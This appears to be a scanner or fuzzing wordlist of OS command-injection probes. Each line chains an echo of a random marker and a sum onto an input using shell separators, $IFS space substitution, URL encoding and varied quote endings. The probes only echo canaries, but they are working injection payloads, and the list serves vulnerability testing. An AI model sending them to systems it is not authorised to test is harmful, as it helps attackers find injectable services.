+os-command-injection,'%20echo%20HYDGEB$((71%2B9))$(echo%20HYDGEB)HYDGEB' +os-command-injection,';echo$IFSCGVCXZ$((66%2B61))$(echo$IFSCGVCXZ)CGVCXZ' +os-command-injection,'&echo$IFSFFEUVI$((96%2B62))$(echo$IFSFFEUVI)FFEUVI' +os-command-injection,'|echo$IFSTZERWA$((97%2B63))$(echo$IFSTZERWA)TZERWA' +os-command-injection,'||echo$IFSECAVFZ$((36%2B1))$(echo$IFSECAVFZ)ECAVFZ' +os-command-injection,'&&echo$IFSWKUYHB$((71%2B18))$(echo$IFSWKUYHB)WKUYHB' +os-command-injection,'%0aecho$IFSUEAGEW$((73%2B31))$(echo$IFSUEAGEW)UEAGEW' +os-command-injection,'%3Becho$IFSKIRJVA$((72%2B54))$(echo$IFSKIRJVA)KIRJVA' +os-command-injection,'%26echo$IFSEYORRP$((46%2B13))$(echo$IFSEYORRP)EYORRP' +os-command-injection,'%26%26echo$IFSZMBRNO$((77%2B76))$(echo$IFSZMBRNO)ZMBRNO' +os-command-injection,'%7Cecho$IFSXCWWGK$((90%2B51))$(echo$IFSXCWWGK)XCWWGK' +os-command-injection,'%7C%7Cecho$IFSHCECZD$((65%2B26))$(echo$IFSHCECZD)HCECZD' +os-command-injection,'echo$IFSNZFJZC$((22%2B7))$(echo$IFSNZFJZC)NZFJZC'' +os-command-injection,'%20echo%20FMIZIK$((70%2B3))$(echo%20FMIZIK)FMIZIK'' +os-command-injection,';echo$IFSSGAACL$((0%2B12))$(echo$IFSSGAACL)SGAACL'' +os-command-injection,'&echo$IFSTKZMMA$((70%2B55))$(echo$IFSTKZMMA)TKZMMA'' +os-command-injection,'|echo$IFSORMIGP$((36%2B81))$(echo$IFSORMIGP)ORMIGP'' +os-command-injection,'||echo$IFSWTNYEV$((5%2B53))$(echo$IFSWTNYEV)WTNYEV'' +os-command-injection,'&&echo$IFSUGBSBK$((46%2B64))$(echo$IFSUGBSBK)UGBSBK'' +os-command-injection,'%0aecho$IFSZOHJGD$((19%2B47))$(echo$IFSZOHJGD)ZOHJGD'' +os-command-injection,'%3Becho$IFSWFUSQI$((24%2B11))$(echo$IFSWFUSQI)WFUSQI'' +os-command-injection,'%26echo$IFSJADCHB$((6%2B80))$(echo$IFSJADCHB)JADCHB'' +os-command-injection,'%26%26echo$IFSDKBFUT$((7%2B8))$(echo$IFSDKBFUT)DKBFUT'' +os-command-injection,'%7Cecho$IFSMDQUDE$((92%2B96))$(echo$IFSMDQUDE)MDQUDE'' +os-command-injection,'%7C%7Cecho$IFSJOEJNW$((26%2B59))$(echo$IFSJOEJNW)JOEJNW'' +os-command-injection,'echo$IFSDYARGF$((39%2B79))$(echo$IFSDYARGF)DYARGF"' +os-command-injection,'%20echo%20NKOHBN$((96%2B64))$(echo%20NKOHBN)NKOHBN"' +os-command-injection,';echo$IFSQKZBJP$((23%2B59))$(echo$IFSQKZBJP)QKZBJP"' +os-command-injection,'&echo$IFSZIGKVR$((87%2B20))$(echo$IFSZIGKVR)ZIGKVR"' +os-command-injection,'|echo$IFSDJJNIK$((63%2B58))$(echo$IFSDJJNIK)DJJNIK"' +os-command-injection,'||echo$IFSRONZCJ$((41%2B90))$(echo$IFSRONZCJ)RONZCJ"' +os-command-injection,'&&echo$IFSPDNJNK$((22%2B74))$(echo$IFSPDNJNK)PDNJNK"' +os-command-injection,'%0aecho$IFSBNKFRX$((81%2B19))$(echo$IFSBNKFRX)BNKFRX"' +os-command-injection,'%3Becho$IFSRWNIHZ$((72%2B65))$(echo$IFSRWNIHZ)RWNIHZ"' +os-command-injection,'%26echo$IFSUXIQZJ$((27%2B95))$(echo$IFSUXIQZJ)UXIQZJ"' +os-command-injection,'%26%26echo$IFSAZHTSE$((68%2B19))$(echo$IFSAZHTSE)AZHTSE"' +os-command-injection,'%7Cecho$IFSAISDYW$((74%2B90))$(echo$IFSAISDYW)AISDYW"' +os-command-injection,'%7C%7Cecho$IFSFFZLXA$((31%2B49))$(echo$IFSFFZLXA)FFZLXA"' +os-command-injection,'echo$IFSIZVWCK$((54%2B72))$(echo$IFSIZVWCK)IZVWCK' +os-command-injection,'%20echo%20KBNMCF$((63%2B18))$(echo%20KBNMCF)KBNMCF' +os-command-injection,';echo$IFSCHWBLL$((41%2B95))$(echo$IFSCHWBLL)CHWBLL' +os-command-injection,'&echo$IFSXMFEYV$((86%2B73))$(echo$IFSXMFEYV)XMFEYV' +os-command-injection,'|echo$IFSJBIOND$((76%2B13))$(echo$IFSJBIOND)JBIOND' +os-command-injection,'||echo$IFSCVUUDY$((8%2B8))$(echo$IFSCVUUDY)CVUUDY' +os-command-injection,'&&echo$IFSNOYZQL$((99%2B8))$(echo$IFSNOYZQL)NOYZQL' +os-command-injection,'%0aecho$IFSZZKJNZ$((11%2B6))$(echo$IFSZZKJNZ)ZZKJNZ' +os-command-injection,'%3Becho$IFSBLFIWK$((29%2B79))$(echo$IFSBLFIWK)BLFIWK' +os-command-injection,'%26echo$IFSKZMAVH$((10%2B87))$(echo$IFSKZMAVH)KZMAVH' +os-command-injection,'%26%26echo$IFSXGZTXT$((91%2B40))$(echo$IFSXGZTXT)XGZTXT' +os-command-injection,'%7Cecho$IFSMYOWIL$((79%2B10))$(echo$IFSMYOWIL)MYOWIL' +os-command-injection,'%7C%7Cecho$IFSLCASZZ$((36%2B54))$(echo$IFSLCASZZ)LCASZZ' +os-command-injection,'echo$IFSGEYHDT$((98%2B13))$(echo$IFSGEYHDT)GEYHDT//' +os-command-injection,'%20echo%20ZDHFWD$((74%2B46))$(echo%20ZDHFWD)ZDHFWD//' +os-command-injection,';echo$IFSWSRCRX$((45%2B83))$(echo$IFSWSRCRX)WSRCRX//' +os-command-injection,'&echo$IFSUTUDJC$((16%2B78))$(echo$IFSUTUDJC)UTUDJC//' +os-command-injection,'|echo$IFSXDYAKY$((50%2B55))$(echo$IFSXDYAKY)XDYAKY//' +os-command-injection,'||echo$IFSURZLFH$((61%2B49))$(echo$IFSURZLFH)URZLFH//' +os-command-injection,'&&echo$IFSPZLWHM$((84%2B59))$(echo$IFSPZLWHM)PZLWHM//' +os-command-injection,'%0aecho$IFSRNGRKM$((66%2B9))$(echo$IFSRNGRKM)RNGRKM//' +os-command-injection,'%3Becho$IFSMGNUUK$((47%2B60))$(echo$IFSMGNUUK)MGNUUK//' +os-command-injection,'%26echo$IFSZNUBXF$((96%2B1))$(echo$IFSZNUBXF)ZNUBXF//' +os-command-injection,'%26%26echo$IFSLOYHDY$((15%2B20))$(echo$IFSLOYHDY)LOYHDY//' +os-command-injection,'%7Cecho$IFSVVVVVP$((21%2B21))$(echo$IFSVVVVVP)VVVVVP//' +os-command-injection,'%7C%7Cecho$IFSJDZYWS$((14%2B65))$(echo$IFSJDZYWS)JDZYWS//' +os-command-injection,'echo$IFSBLWDWQ$((23%2B19))$(echo$IFSBLWDWQ)BLWDWQ\' +os-command-injection,'%20echo%20HNHGPN$((18%2B32))$(echo%20HNHGPN)HNHGPN\' +os-command-injection,';echo$IFSJCPFVL$((55%2B99))$(echo$IFSJCPFVL)JCPFVL\' +os-command-injection,'&echo$IFSDZELLQ$((7%2B27))$(echo$IFSDZELLQ)DZELLQ\' +os-command-injection,'|echo$IFSDMNIBS$((2%2B86))$(echo$IFSDMNIBS)DMNIBS\' +os-command-injection,'||echo$IFSJNIADE$((97%2B6))$(echo$IFSJNIADE)JNIADE\' +os-command-injection,'&&echo$IFSPKOWIK$((48%2B16))$(echo$IFSPKOWIK)PKOWIK\' +os-command-injection,'%0aecho$IFSBYOTYG$((4%2B40))$(echo$IFSBYOTYG)BYOTYG\' +os-command-injection,'%3Becho$IFSXLTPVN$((45%2B86))$(echo$IFSXLTPVN)XLTPVN\' +os-command-injection,'%26echo$IFSNINVIO$((20%2B74))$(echo$IFSNINVIO)NINVIO\' +os-command-injection,'%26%26echo$IFSMUFURB$((94%2B1))$(echo$IFSMUFURB)MUFURB\' +os-command-injection,'%7Cecho$IFSWGMKFN$((19%2B9))$(echo$IFSWGMKFN)WGMKFN\' +os-command-injection,'%7C%7Cecho$IFSGYKBRP$((2%2B36))$(echo$IFSGYKBRP)GYKBRP\' +os-command-injection,'echo$IFSBCFSQL$((44%2B41))$(echo$IFSBCFSQL)BCFSQL&' +os-command-injection,'%20echo%20EXSSVL$((23%2B38))$(echo%20EXSSVL)EXSSVL&' +os-command-injection,';echo$IFSFNTIKC$((99%2B9))$(echo$IFSFNTIKC)FNTIKC&' +os-command-injection,'&echo$IFSCDQGLR$((84%2B68))$(echo$IFSCDQGLR)CDQGLR&' +os-command-injection,'|echo$IFSIPMDQM$((24%2B45))$(echo$IFSIPMDQM)IPMDQM&' +os-command-injection,'||echo$IFSXMUMCF$((41%2B92))$(echo$IFSXMUMCF)XMUMCF&' +os-command-injection,'&&echo$IFSRINUBZ$((32%2B73))$(echo$IFSRINUBZ)RINUBZ&' +os-command-injection,'%0aecho$IFSHFIVLV$((26%2B18))$(echo$IFSHFIVLV)HFIVLV&' +os-command-injection,'%3Becho$IFSVJOZLQ$((35%2B89))$(echo$IFSVJOZLQ)VJOZLQ&' +os-command-injection,'%26echo$IFSRBZNOQ$((4%2B13))$(echo$IFSRBZNOQ)RBZNOQ&' +os-command-injection,'%26%26echo$IFSDGAVAR$((61%2B22))$(echo$IFSDGAVAR)DGAVAR&' +os-command-injection,'%7Cecho$IFSIMXNSU$((31%2B19))$(echo$IFSIMXNSU)IMXNSU&' +os-command-injection,'%7C%7Cecho$IFSPTDKZC$((94%2B78))$(echo$IFSPTDKZC)PTDKZC&' +os-command-injection,'echo$IFSZFQEOG$((33%2B69))$(echo$IFSZFQEOG)ZFQEOG|' +os-command-injection,'%20echo%20WBCZIC$((68%2B36))$(echo%20WBCZIC)WBCZIC|' +os-command-injection,';echo$IFSRFYMLA$((34%2B26))$(echo$IFSRFYMLA)RFYMLA|' +os-command-injection,'&echo$IFSNCQFBP$((1%2B82))$(echo$IFSNCQFBP)NCQFBP|' +os-command-injection,'|echo$IFSHOMJAN$((98%2B15))$(echo$IFSHOMJAN)HOMJAN|' +os-command-injection,'||echo$IFSFWBTCO$((35%2B92))$(echo$IFSFWBTCO)FWBTCO|' +os-command-injection,'&&echo$IFSRSHHHN$((76%2B74))$(echo$IFSRSHHHN)RSHHHN|' +os-command-injection,'%0aecho$IFSLFCSIP$((11%2B52))$(echo$IFSLFCSIP)LFCSIP|' +os-command-injection,'%3Becho$IFSSVGWCX$((39%2B64))$(echo$IFSSVGWCX)SVGWCX|' +os-command-injection,'%26echo$IFSDNXBTT$((20%2B50))$(echo$IFSDNXBTT)DNXBTT|' +os-command-injection,'%26%26echo$IFSBEYMPV$((1%2B26))$(echo$IFSBEYMPV)BEYMPV|' +os-command-injection,'%7Cecho$IFSXBQKGF$((50%2B52))$(echo$IFSXBQKGF)XBQKGF|' +os-command-injection,'%7C%7Cecho$IFSPNDELB$((5%2B40))$(echo$IFSPNDELB)PNDELB|' +os-command-injection,'echo$IFSCXOURS$((94%2B53))$(echo$IFSCXOURS)CXOURS%27' +os-command-injection,'%20echo%20INJQRH$((6%2B71))$(echo%20INJQRH)INJQRH%27' +os-command-injection,';echo$IFSQTUCLW$((99%2B59))$(echo$IFSQTUCLW)QTUCLW%27' +os-command-injection,'&echo$IFSELNTMF$((54%2B89))$(echo$IFSELNTMF)ELNTMF%27' +os-command-injection,'|echo$IFSSXSTPH$((13%2B95))$(echo$IFSSXSTPH)SXSTPH%27' +os-command-injection,'||echo$IFSNWCALI$((76%2B93))$(echo$IFSNWCALI)NWCALI%27' +os-command-injection,'&&echo$IFSPKZNVA$((74%2B55))$(echo$IFSPKZNVA)PKZNVA%27' +os-command-injection,'%0aecho$IFSIRGGOI$((52%2B59))$(echo$IFSIRGGOI)IRGGOI%27' +os-command-injection,'%3Becho$IFSBRMMWH$((16%2B74))$(echo$IFSBRMMWH)BRMMWH%27' +os-command-injection,'%26echo$IFSXOUJEA$((42%2B77))$(echo$IFSXOUJEA)XOUJEA%27' +os-command-injection,'%26%26echo$IFSHUXXMI$((11%2B6))$(echo$IFSHUXXMI)HUXXMI%27' +os-command-injection,'%7Cecho$IFSTOMLNP$((44%2B6))$(echo$IFSTOMLNP)TOMLNP%27' +os-command-injection,'%7C%7Cecho$IFSXRJUZC$((77%2B52))$(echo$IFSXRJUZC)XRJUZC%27' +os-command-injection,'echo$IFSYLWBCG$((49%2B32))$(echo$IFSYLWBCG)YLWBCG%22' +os-command-injection,'%20echo%20KHSDYB$((90%2B99))$(echo%20KHSDYB)KHSDYB%22' +os-command-injection,';echo$IFSKYWEBG$((28%2B35))$(echo$IFSKYWEBG)KYWEBG%22' +os-command-injection,'&echo$IFSIREVYM$((76%2B29))$(echo$IFSIREVYM)IREVYM%22' +os-command-injection,'|echo$IFSYOCGJF$((96%2B37))$(echo$IFSYOCGJF)YOCGJF%22' +os-command-injection,'||echo$IFSTLJWZW$((6%2B13))$(echo$IFSTLJWZW)TLJWZW%22' +os-command-injection,'&&echo$IFSFQYHVF$((35%2B20))$(echo$IFSFQYHVF)FQYHVF%22' +os-command-injection,'%0aecho$IFSBXCEBE$((79%2B33))$(echo$IFSBXCEBE)BXCEBE%22' +os-command-injection,'%3Becho$IFSIHCKXN$((49%2B14))$(echo$IFSIHCKXN)IHCKXN%22' +os-command-injection,'%26echo$IFSUDHXJK$((28%2B24))$(echo$IFSUDHXJK)UDHXJK%22' +os-command-injection,'%26%26echo$IFSXMOMPZ$((26%2B20))$(echo$IFSXMOMPZ)XMOMPZ%22' +os-command-injection,'%7Cecho$IFSLFROFF$((34%2B43))$(echo$IFSLFROFF)LFROFF%22' +os-command-injection,'%7C%7Cecho$IFSVRKQRS$((64%2B26))$(echo$IFSVRKQRS)VRKQRS%22' +os-command-injection,'echo$IFSPQLHVF$((2%2B67))$(echo$IFSPQLHVF)PQLHVF%5C%5C' +os-command-injection,'%20echo%20ZRVFNO$((8%2B89))$(echo%20ZRVFNO)ZRVFNO%5C%5C' +os-command-injection,';echo$IFSXHQGTT$((9%2B46))$(echo$IFSXHQGTT)XHQGTT%5C%5C' +os-command-injection,'&echo$IFSRITAKD$((40%2B96))$(echo$IFSRITAKD)RITAKD%5C%5C' +os-command-injection,'|echo$IFSZIARXP$((32%2B15))$(echo$IFSZIARXP)ZIARXP%5C%5C' +os-command-injection,'||echo$IFSGJJLJU$((79%2B31))$(echo$IFSGJJLJU)GJJLJU%5C%5C' +os-command-injection,'&&echo$IFSJKTFHJ$((76%2B41))$(echo$IFSJKTFHJ)JKTFHJ%5C%5C' +os-command-injection,'%0aecho$IFSXLUCPI$((48%2B78))$(echo$IFSXLUCPI)XLUCPI%5C%5C' +os-command-injection,'%3Becho$IFSNAZRRA$((96%2B66))$(echo$IFSNAZRRA)NAZRRA%5C%5C' +os-command-injection,'%26echo$IFSOVSHWQ$((85%2B7))$(echo$IFSOVSHWQ)OVSHWQ%5C%5C' +os-command-injection,'%26%26echo$IFSBLLPPH$((41%2B65))$(echo$IFSBLLPPH)BLLPPH%5C%5C' +os-command-injection,'%7Cecho$IFSSSATLL$((5%2B73))$(echo$IFSSSATLL)SSATLL%5C%5C' +os-command-injection,'%7C%7Cecho$IFSPZVPFS$((15%2B73))$(echo$IFSPZVPFS)PZVPFS%5C%5C' +os-command-injection,'echo$IFSPDGOWG$((0%2B24))$(echo$IFSPDGOWG)PDGOWG%2F%2F' +os-command-injection,'%20echo%20BZWIPM$((39%2B43))$(echo%20BZWIPM)BZWIPM%2F%2F' +os-command-injection,';echo$IFSMPQJPO$((25%2B59))$(echo$IFSMPQJPO)MPQJPO%2F%2F' +os-command-injection,'&echo$IFSYCZAGJ$((43%2B61))$(echo$IFSYCZAGJ)YCZAGJ%2F%2F' +os-command-injection,'|echo$IFSKBEHVQ$((68%2B63))$(echo$IFSKBEHVQ)KBEHVQ%2F%2F' +os-command-injection,'||echo$IFSFXXJSB$((43%2B97))$(echo$IFSFXXJSB)FXXJSB%2F%2F' +os-command-injection,'&&echo$IFSGYBOFQ$((1%2B26))$(echo$IFSGYBOFQ)GYBOFQ%2F%2F' +os-command-injection,'%0aecho$IFSSAUSPH$((85%2B99))$(echo$IFSSAUSPH)SAUSPH%2F%2F' +os-command-injection,'%3Becho$IFSMEDOMQ$((22%2B39))$(echo$IFSMEDOMQ)MEDOMQ%2F%2F' +os-command-injection,'%26echo$IFSSCACNS$((89%2B8))$(echo$IFSSCACNS)SCACNS%2F%2F' +os-command-injection,'%26%26echo$IFSBWMKQC$((8%2B22))$(echo$IFSBWMKQC)BWMKQC%2F%2F' +os-command-injection,'%7Cecho$IFSACSCAR$((68%2B50))$(echo$IFSACSCAR)ACSCAR%2F%2F' +os-command-injection,'%7C%7Cecho$IFSIUFXEF$((53%2B74))$(echo$IFSIUFXEF)IUFXEF%2F%2F' +os-command-injection,'echo$IFSODFQBQ$((97%2B35))$(echo$IFSODFQBQ)ODFQBQ%26' +os-command-injection,'%20echo%20MIJFWA$((64%2B47))$(echo%20MIJFWA)MIJFWA%26' +os-command-injection,';echo$IFSORHOEA$((71%2B59))$(echo$IFSORHOEA)ORHOEA%26' +os-command-injection,'&echo$IFSASRUTA$((40%2B74))$(echo$IFSASRUTA)ASRUTA%26' +os-command-injection,'|echo$IFSNAGEDU$((57%2B86))$(echo$IFSNAGEDU)NAGEDU%26' +os-command-injection,'||echo$IFSCZXGHY$((46%2B9))$(echo$IFSCZXGHY)CZXGHY%26' +os-command-injection,'&&echo$IFSNIEFDN$((50%2B18))$(echo$IFSNIEFDN)NIEFDN%26' +os-command-injection,'%0aecho$IFSLHUMDB$((44%2B69))$(echo$IFSLHUMDB)LHUMDB%26' +os-command-injection,'%3Becho$IFSSWBWIU$((54%2B20))$(echo$IFSSWBWIU)SWBWIU%26' +os-command-injection,'%26echo$IFSRNWYRS$((8%2B9))$(echo$IFSRNWYRS)RNWYRS%26' +os-command-injection,'%26%26echo$IFSRYMPKL$((65%2B92))$(echo$IFSRYMPKL)RYMPKL%26' +os-command-injection,'%7Cecho$IFSSHWGOU$((49%2B48))$(echo$IFSSHWGOU)SHWGOU%26' +os-command-injection,'%7C%7Cecho$IFSHOZWON$((0%2B42))$(echo$IFSHOZWON)HOZWON%26' +os-command-injection,'echo$IFSCTYHYD$((2%2B94))$(echo$IFSCTYHYD)CTYHYD%7C' +os-command-injection,'%20echo%20FKYLQT$((77%2B70))$(echo%20FKYLQT)FKYLQT%7C' +os-command-injection,';echo$IFSXSICUY$((6%2B35))$(echo$IFSXSICUY)XSICUY%7C' +os-command-injection,'&echo$IFSCQTRHA$((48%2B25))$(echo$IFSCQTRHA)CQTRHA%7C' +os-command-injection,'|echo$IFSSZYRBG$((69%2B52))$(echo$IFSSZYRBG)SZYRBG%7C' +os-command-injection,'||echo$IFSOSSFDF$((81%2B9))$(echo$IFSOSSFDF)OSSFDF%7C' +os-command-injection,'&&echo$IFSIIUTLW$((40%2B43))$(echo$IFSIIUTLW)IIUTLW%7C' +os-command-injection,'%0aecho$IFSIEMDKC$((84%2B27))$(echo$IFSIEMDKC)IEMDKC%7C' +os-command-injection,'%3Becho$IFSJJRDLY$((50%2B38))$(echo$IFSJJRDLY)JJRDLY%7C' +os-command-injection,'%26echo$IFSKKDTAV$((24%2B52))$(echo$IFSKKDTAV)KKDTAV%7C' +os-command-injection,'%26%26echo$IFSHKTTXB$((80%2B17))$(echo$IFSHKTTXB)HKTTXB%7C' +os-command-injection,'%7Cecho$IFSBJUKKI$((91%2B15))$(echo$IFSBJUKKI)BJUKKI%7C' +os-command-injection,'%7C%7Cecho$IFSWFBDXM$((8%2B58))$(echo$IFSWFBDXM)WFBDXM%7C' +os-command-injection,''echo$IFSMEFODD$((49%2B43))$(echo$IFSMEFODD)MEFODD' +os-command-injection,''%20echo%20DKPBFA$((11%2B2))$(echo%20DKPBFA)DKPBFA' +os-command-injection,'';echo$IFSJNEQYI$((45%2B53))$(echo$IFSJNEQYI)JNEQYI' +os-command-injection,''&echo$IFSVXICUW$((74%2B51))$(echo$IFSVXICUW)VXICUW' +os-command-injection,''|echo$IFSBJGHKO$((79%2B18))$(echo$IFSBJGHKO)BJGHKO' +os-command-injection,''||echo$IFSHMEDQM$((69%2B73))$(echo$IFSHMEDQM)HMEDQM' +os-command-injection,''&&echo$IFSNKJIAU$((64%2B2))$(echo$IFSNKJIAU)NKJIAU' +os-command-injection,''%0aecho$IFSDENYJC$((91%2B76))$(echo$IFSDENYJC)DENYJC' +os-command-injection,''%3Becho$IFSVZDGLS$((78%2B51))$(echo$IFSVZDGLS)VZDGLS' +os-command-injection,''%26echo$IFSMYWSGV$((8%2B92))$(echo$IFSMYWSGV)MYWSGV' +os-command-injection,''%26%26echo$IFSSDYEBH$((96%2B90))$(echo$IFSSDYEBH)SDYEBH' +os-command-injection,''%7Cecho$IFSKVFINL$((98%2B1))$(echo$IFSKVFINL)KVFINL' +os-command-injection,''%7C%7Cecho$IFSBNFEWG$((17%2B39))$(echo$IFSBNFEWG)BNFEWG' +os-command-injection,''echo$IFSEOXXHA$((67%2B86))$(echo$IFSEOXXHA)EOXXHA'' +os-command-injection,''%20echo%20ROHIPP$((50%2B29))$(echo%20ROHIPP)ROHIPP'' +os-command-injection,'';echo$IFSRFBYSO$((8%2B13))$(echo$IFSRFBYSO)RFBYSO'' +os-command-injection,''&echo$IFSIZVZGQ$((7%2B67))$(echo$IFSIZVZGQ)IZVZGQ'' +os-command-injection,''|echo$IFSANVKGR$((37%2B60))$(echo$IFSANVKGR)ANVKGR'' +os-command-injection,''||echo$IFSVBATPV$((60%2B79))$(echo$IFSVBATPV)VBATPV'' +os-command-injection,''&&echo$IFSGYGLII$((94%2B74))$(echo$IFSGYGLII)GYGLII'' +os-command-injection,''%0aecho$IFSEPGLGV$((67%2B48))$(echo$IFSEPGLGV)EPGLGV'' +os-command-injection,''%3Becho$IFSXZROZE$((34%2B62))$(echo$IFSXZROZE)XZROZE'' +os-command-injection,''%26echo$IFSTYRLAC$((15%2B80))$(echo$IFSTYRLAC)TYRLAC'' +os-command-injection,''%26%26echo$IFSRFOIHP$((11%2B2))$(echo$IFSRFOIHP)RFOIHP'' +os-command-injection,''%7Cecho$IFSRRSKSU$((82%2B69))$(echo$IFSRRSKSU)RRSKSU'' +os-command-injection,''%7C%7Cecho$IFSTCDXDV$((24%2B86))$(echo$IFSTCDXDV)TCDXDV'' +os-command-injection,''echo$IFSJWHAWX$((24%2B49))$(echo$IFSJWHAWX)JWHAWX"' +os-command-injection,''%20echo%20DHXKNT$((83%2B17))$(echo%20DHXKNT)DHXKNT"' +os-command-injection,'';echo$IFSIYVDAV$((58%2B88))$(echo$IFSIYVDAV)IYVDAV"' +os-command-injection,''&echo$IFSUSKOQC$((80%2B64))$(echo$IFSUSKOQC)USKOQC"' +os-command-injection,''|echo$IFSPZXCHL$((23%2B27))$(echo$IFSPZXCHL)PZXCHL"' +os-command-injection,''||echo$IFSHZAALW$((51%2B4))$(echo$IFSHZAALW)HZAALW"' +os-command-injection,''&&echo$IFSBDQKRH$((34%2B46))$(echo$IFSBDQKRH)BDQKRH"' +os-command-injection,''%0aecho$IFSJQCWHP$((66%2B43))$(echo$IFSJQCWHP)JQCWHP"' +os-command-injection,''%3Becho$IFSAOVBIV$((21%2B3))$(echo$IFSAOVBIV)AOVBIV"' +os-command-injection,''%26echo$IFSSYOFDN$((87%2B15))$(echo$IFSSYOFDN)SYOFDN"' +os-command-injection,''%26%26echo$IFSTIZZUZ$((99%2B85))$(echo$IFSTIZZUZ)TIZZUZ"' +os-command-injection,''%7Cecho$IFSYCCUIZ$((60%2B63))$(echo$IFSYCCUIZ)YCCUIZ"' +os-command-injection,''%7C%7Cecho$IFSVFIJUP$((58%2B16))$(echo$IFSVFIJUP)VFIJUP"' +os-command-injection,''echo$IFSKZIGXE$((85%2B95))$(echo$IFSKZIGXE)KZIGXE' +os-command-injection,''%20echo%20IILRDW$((70%2B47))$(echo%20IILRDW)IILRDW' +os-command-injection,'';echo$IFSHXTARE$((60%2B40))$(echo$IFSHXTARE)HXTARE' +os-command-injection,''&echo$IFSZFQGSY$((67%2B86))$(echo$IFSZFQGSY)ZFQGSY' +os-command-injection,''|echo$IFSBTCBHW$((54%2B8))$(echo$IFSBTCBHW)BTCBHW' +os-command-injection,''||echo$IFSTQUEWX$((62%2B61))$(echo$IFSTQUEWX)TQUEWX' +os-command-injection,''&&echo$IFSQCRXUV$((17%2B13))$(echo$IFSQCRXUV)QCRXUV' +os-command-injection,''%0aecho$IFSUOWFKR$((67%2B63))$(echo$IFSUOWFKR)UOWFKR' +os-command-injection,''%3Becho$IFSTJRXTN$((69%2B61))$(echo$IFSTJRXTN)TJRXTN' +os-command-injection,''%26echo$IFSDVJEEK$((20%2B0))$(echo$IFSDVJEEK)DVJEEK' +os-command-injection,''%26%26echo$IFSNIRIZQ$((64%2B4))$(echo$IFSNIRIZQ)NIRIZQ' +os-command-injection,''%7Cecho$IFSFGVWTS$((53%2B41))$(echo$IFSFGVWTS)FGVWTS' +os-command-injection,''%7C%7Cecho$IFSONXHJN$((84%2B16))$(echo$IFSONXHJN)ONXHJN' +os-command-injection,''echo$IFSMHUBAH$((13%2B52))$(echo$IFSMHUBAH)MHUBAH//' +os-command-injection,''%20echo%20OBUGDN$((69%2B8))$(echo%20OBUGDN)OBUGDN//' +os-command-injection,'';echo$IFSZQZKMV$((83%2B46))$(echo$IFSZQZKMV)ZQZKMV//' +os-command-injection,''&echo$IFSDJQYUP$((21%2B12))$(echo$IFSDJQYUP)DJQYUP//' +os-command-injection,''|echo$IFSXMLIVZ$((57%2B49))$(echo$IFSXMLIVZ)XMLIVZ//' +os-command-injection,''||echo$IFSHBYFDI$((44%2B65))$(echo$IFSHBYFDI)HBYFDI//' +os-command-injection,''&&echo$IFSWCCAON$((69%2B13))$(echo$IFSWCCAON)WCCAON//' +os-command-injection,''%0aecho$IFSWHMVQH$((51%2B53))$(echo$IFSWHMVQH)WHMVQH//' +os-command-injection,''%3Becho$IFSTMWIFK$((5%2B69))$(echo$IFSTMWIFK)TMWIFK//' +os-command-injection,''%26echo$IFSZJHAFI$((51%2B78))$(echo$IFSZJHAFI)ZJHAFI//' +os-command-injection,''%26%26echo$IFSDSUEVY$((21%2B5))$(echo$IFSDSUEVY)DSUEVY//' +os-command-injection,''%7Cecho$IFSHUIGCW$((90%2B23))$(echo$IFSHUIGCW)HUIGCW//' +os-command-injection,''%7C%7Cecho$IFSBSPLUO$((96%2B67))$(echo$IFSBSPLUO)BSPLUO//' +os-command-injection,''echo$IFSWTMGEX$((31%2B97))$(echo$IFSWTMGEX)WTMGEX\' +os-command-injection,''%20echo%20YLUZLM$((52%2B54))$(echo%20YLUZLM)YLUZLM\' +os-command-injection,'';echo$IFSYRIWFC$((51%2B76))$(echo$IFSYRIWFC)YRIWFC\' +os-command-injection,''&echo$IFSHDKHON$((74%2B41))$(echo$IFSHDKHON)HDKHON\' +os-command-injection,''|echo$IFSQMGDOR$((26%2B14))$(echo$IFSQMGDOR)QMGDOR\' +os-command-injection,''||echo$IFSVWMBCL$((58%2B34))$(echo$IFSVWMBCL)VWMBCL\' +os-command-injection,''&&echo$IFSAECLDN$((15%2B72))$(echo$IFSAECLDN)AECLDN\' +os-command-injection,''%0aecho$IFSLLJNSS$((65%2B11))$(echo$IFSLLJNSS)LLJNSS\' +os-command-injection,''%3Becho$IFSYIYMKI$((91%2B72))$(echo$IFSYIYMKI)YIYMKI\' +os-command-injection,''%26echo$IFSANEBTG$((60%2B67))$(echo$IFSANEBTG)ANEBTG\' +os-command-injection,''%26%26echo$IFSLLLNBB$((5%2B69))$(echo$IFSLLLNBB)LLLNBB\' +os-command-injection,''%7Cecho$IFSDUIYBT$((30%2B8))$(echo$IFSDUIYBT)DUIYBT\' +os-command-injection,''%7C%7Cecho$IFSBZCSNS$((71%2B69))$(echo$IFSBZCSNS)BZCSNS\' +os-command-injection,''echo$IFSUCMQAW$((90%2B56))$(echo$IFSUCMQAW)UCMQAW&' +os-command-injection,''%20echo%20MCIHDY$((46%2B63))$(echo%20MCIHDY)MCIHDY&' +os-command-injection,'';echo$IFSTXFXOH$((52%2B49))$(echo$IFSTXFXOH)TXFXOH&' +os-command-injection,''&echo$IFSJGGFVO$((61%2B53))$(echo$IFSJGGFVO)JGGFVO&' +os-command-injection,''|echo$IFSFUKEZB$((71%2B34))$(echo$IFSFUKEZB)FUKEZB&' +os-command-injection,''||echo$IFSDBSTLF$((93%2B67))$(echo$IFSDBSTLF)DBSTLF&' +os-command-injection,''&&echo$IFSJJWTOM$((43%2B29))$(echo$IFSJJWTOM)JJWTOM&' +os-command-injection,''%0aecho$IFSUZEOGM$((31%2B46))$(echo$IFSUZEOGM)UZEOGM&' +os-command-injection,''%3Becho$IFSMWZRJO$((7%2B81))$(echo$IFSMWZRJO)MWZRJO&' +os-command-injection,''%26echo$IFSFRPBJA$((6%2B14))$(echo$IFSFRPBJA)FRPBJA&' +os-command-injection,''%26%26echo$IFSLRQJZI$((98%2B24))$(echo$IFSLRQJZI)LRQJZI&' +os-command-injection,''%7Cecho$IFSHYUMCY$((48%2B63))$(echo$IFSHYUMCY)HYUMCY&' +os-command-injection,''%7C%7Cecho$IFSJMIQOC$((14%2B31))$(echo$IFSJMIQOC)JMIQOC&' +os-command-injection,''echo$IFSKFKPRE$((22%2B12))$(echo$IFSKFKPRE)KFKPRE|' +os-command-injection,''%20echo%20HYHGIN$((59%2B21))$(echo%20HYHGIN)HYHGIN|' +os-command-injection,'';echo$IFSTDCNYP$((73%2B27))$(echo$IFSTDCNYP)TDCNYP|' +os-command-injection,''&echo$IFSJSKJAE$((33%2B64))$(echo$IFSJSKJAE)JSKJAE|' 